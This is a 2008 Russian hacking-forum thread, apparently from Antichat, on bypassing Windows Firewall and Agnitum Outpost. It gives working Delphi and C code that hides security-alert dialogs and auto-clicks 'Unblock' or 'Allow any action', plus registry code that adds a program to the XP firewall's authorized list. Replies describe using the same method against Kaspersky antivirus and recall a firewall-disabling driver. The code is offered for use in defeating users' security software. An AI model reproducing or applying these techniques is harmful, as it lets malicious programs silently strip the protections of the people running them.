Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Обход брандмауэров. (https://forum.antichat.xyz/showthread.php?t=80817)

o_OBallers 14.08.2008 08:16

Обход брандмауэров.
 
Обход брандмауэров.

Данный метод обхода брандмауэров, не является новым, и известен уже много лет.
Я решил описать его подробно из-за следующей ситуации:

Автор вопроса: Как мне обойти брандмауэр.
Blucksun: Ищи окно, когда найдешь манипулируй дочерними контролами как тебе нужно.

Ответ Blucksun абсолютно верный только кто из прочитавших, понял как же всё таки обходить брандмауэр.
Тут ситуация сходная с сексом в подростковой среде, все думают что у товарищей он уже был, а у меня нет, на самом деле ни у кого не было.
Вообщем лясём-трясём а рабочего кода нет, одни только слова.
Я решил исправить эту ситуацию всё подробно объяснив.

Разберёмся на примере стандартного брандмауэра.
Вначале пишешь прогу которая должна работать с инетом.
В уже готовый исходник пишешь код открывающий на прослушивание любой порт, например 22222. Тут же вылетает сообщение «Чтобы помочь защитить компьютер…….»,
Чтобы всё было нормально нужно чтобы была нажата кнопка «Разблокировать».
Нужно найти окно по заголовку «Оповещение системы безопасности Windows».
Потом найти контрол с заголовком «Разблокировать».
Нажать на этот контрол, и приложение будет добавлено в список доверенных.

Код:

var Handle1, Handle2: integer;
begin
  Handle1 := 0;
  Handle2 := 0;
  while  Handle1 = 0 do
    begin
      Handle1 := FindWindow(nil, ‘Оповещение системы безопасности Windows’);
    end;
  Handle2 := FindWindowEx(Handle1, 0, nil, '&Разблокировать');
  SendMessage(Handle2, BM_CLICK, 0, 0);
end;

Маленькое пояснение по коду. По идее должно быть «Разблокировать» вместо '&Разблокировать' но не верьте своим глазам ужасно хитрые программисты из Microsoft неизвестно зачем добавили невидимый знак амперсанда. Я узнал это запустив программу WinSight32, которая поставляется вместе с Delphi, в ней я нашёл строчку «Оповещение системы безопасности Windows», щёлкнул на плюсик возле неё и увидел все дочерние элементы этого окна возле одного из них и красовалось '&Разблокировать'.

Стандартный брандмауэр пройден теперь разберёмся с Игнатум Оутпост.
Чтобы вы не спорили я сразу напишу на какой версии я тестировал код – Agnitum Outpost Firewall FREE 1.0.1817.

Данный брандмауэр имеет следующие политики Отключить, Запрещать, Блокировать,
Обучение, Разрешать.
Отключить, Запрещать, Разрешать, - крайне бесполезные политики приводящие к неработоспособности всех подключений, любо брандмауэр будет тупо висеть в памяти.
Политика блокировать, разрешает только явно разрешённые подключения, остальные блокирует без разговоров очень неудобно, например скачал ты новую программу работающую с Интернетом установил, а она не работает, потому что ты забыл в настройках её прописать.

Самая лучшая политика это обучение, как только новая программа лезет в сеть вылезает окно с разнообразными предложениями по поводу этой программы, разумеется возможно ей разрешить выполнять любые действия. Мы рассмотрим добавление нашего приложения в список доверенных при этой политики безопасности.

Когда работает Outpost, WinSight32 запустить невозможно.
Но этого, и не надо разработчики написали на кнопках правду как она есть, без всяких дополнительных символов.

Итак для того чтобы обойти оутпост нужно:
Спровоцировать брандмауэр показать окно создать окно создания правил.
Найти окно с заголовком «Создать правило для» + имя вашего приложения заглавными буквами например «Создать правило для MSFTP.EXE».
Найти дочерний контрол с заголовком «Разрешить этому приложению выполнять любые действия».
Щёлкнуть на него.
Найти дочерний контрол с заголовкои «OK».
Щёлкнуть на него.
Приложение добавлено в список доверенных.
Код:

var Handle1, Handle2: integer;
begin
  Handle1 := 0;
  Handle2 := 0;
  while  Handle1 = 0 do
    begin
      Handle1 := FindWindow(nil, ‘Создать правило для MSFTP.EXE');
    end;
  Handle2 := FindWindowEx(Handle1, 0, nil, 'Разрешить этому приложению выполнять любые действия');
  SendMessage(Handle2, BM_CLICK, 0, 0);
  Handle2 := FindWindowEx(Handle1, 0, nil, 'OK');
  SendMessage(Handle2, BM_CLICK, 0, 0);

Данный метод если применить мозг можно использовать для обхода или выключения любой другой защиты, будь то любой другой брандмауэр, или незапароленный антивирус.

o_OBallers(Alaget) специально для античат.

slesh 14.08.2008 09:44

Методы хороши были, но увы на англоязычных вариантах это не прокатит.
небольшое дополнение можно дописать к статье. Всем известный обход XP фаера
Код:

procedure fuck_xpfw;
var
key:longword;
ValueName:array[0..255] of char;
Value:string;
const
path='SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List';

begin
 if RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_ALL_ACCESS, key)<>0 then exit;
 GetModuleFileName(GetModuleHandle(nil), ValueName, 256);
 Value:=ValueName+':*:Enabled:RPC';
 RegSetValueEx(key, ValueName, 0, REG_SZ, pchar(Value), length(Value));
 RegCloseKey(key);
end;


slider 14.08.2008 10:08

хых... у меня всё это выглядело примерно так:

Код:

#include <windows.h>
#include <conio.h>

void sleep(DWORD dwMilliseconds);
DWORD WINAPI ThreadFunc(LPVOID lpParam)
{
while(1000){
HWND wbm;
wbm=FindWindow("#32770",0);
ShowWindow(wbm,SW_HIDE);
SendMessage(wbm,WM_COMMAND,BN_CLICKED,104);
}
}

DWORD WINAPI ThreadFunc1(LPVOID lpParam)
{
while(1000){
HWND opf;
opf=FindWindow("#32770",0);
ShowWindow(opf,SW_HIDE);
CheckDlgButton(opf,1007,0);
CheckDlgButton(opf,1006,1);
SendMessage(opf,WM_COMMAND,BN_CLICKED,1055);
opf=FindWindowEx(opf,0,0,"OK");
SendMessage(opf,BM_CLICK,0,0);
}
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine, int nCmdShow)
{
DWORD dwThreadId, dwThrdParam = 1;
HANDLE hThread;
HANDLE hThread1;
hThread = CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
hThread1 = CreateThread(NULL,0,ThreadFunc1,&dwThrdParam,0,&dwThreadId);
if (hThread != NULL)
{_getch();CloseHandle( hThread );}
if (hThread != NULL)
{_getch();CloseHandle( hThread1 );}
sleep(25);
return 0;
}

И outpost firewall отдыхал.... и брандмауэр тихо сопел в газетку

Pernat1y 14.08.2008 10:15

и того-же каспера так не обойдеш

slider 14.08.2008 10:19

И даже Каспера можно немного по другому обойти ;)

Pernat1y 14.08.2008 10:23

"немного по другому", это разрешить в нем управление с других процессов, или еще как-то?

slesh 14.08.2008 10:35

Когдато давно давно был выложен драйвер написанный на asm который запросто отрубал фаеры. Палился жестоко он. Но самое интерестное, что достаточно было гденить в начале поставить pushad popad? скомпельнуть и его сново можно было юзать

zeppe1in 14.08.2008 10:44

программисты из Microsoft вовсе не хитрые. В случае &Разблокировать буква Р должна быть подчоркнутой. и на неё можно нажать комбинацией alt+Р. Вот для чего нужен &

vvs777 15.08.2008 20:44

На самом деле спектр применения ограничивается только извращенностью головного мозга программиста. :p

Цитата:

GetWindow()
gw_first, gw_next,
wintext=GetWindowText(...)
if pos('азблокир',wintext)>0...
Короче говоря плевать что там подчеркнуто...
ифов можно кучу. Можно массив ключевых слов на всех языках мира.
Можно "конфигурацию профилей" сделать для каждой проги и полная универсальность гоотова.
Можно хук на открытие окна повесить - еще веселее.
+ еще проверка чтоб только на твою прогу а то это будет тотальный ппц =)

Я так с антивирусами боролся.
Каспер 5,6 прекрасно идет. :D . 7й уже не пробовал.

Цитата:

Когдато давно давно был выложен драйвер
как хоть назвался? хотелось бы посмотреть на это

Gray_f0x 16.08.2008 14:14

а как же iptables + NAT на отдельном компьюторе а комп юзвери в подсети которая закрыта для внешки полностью и выход в инет через проксик?


Время: 19:25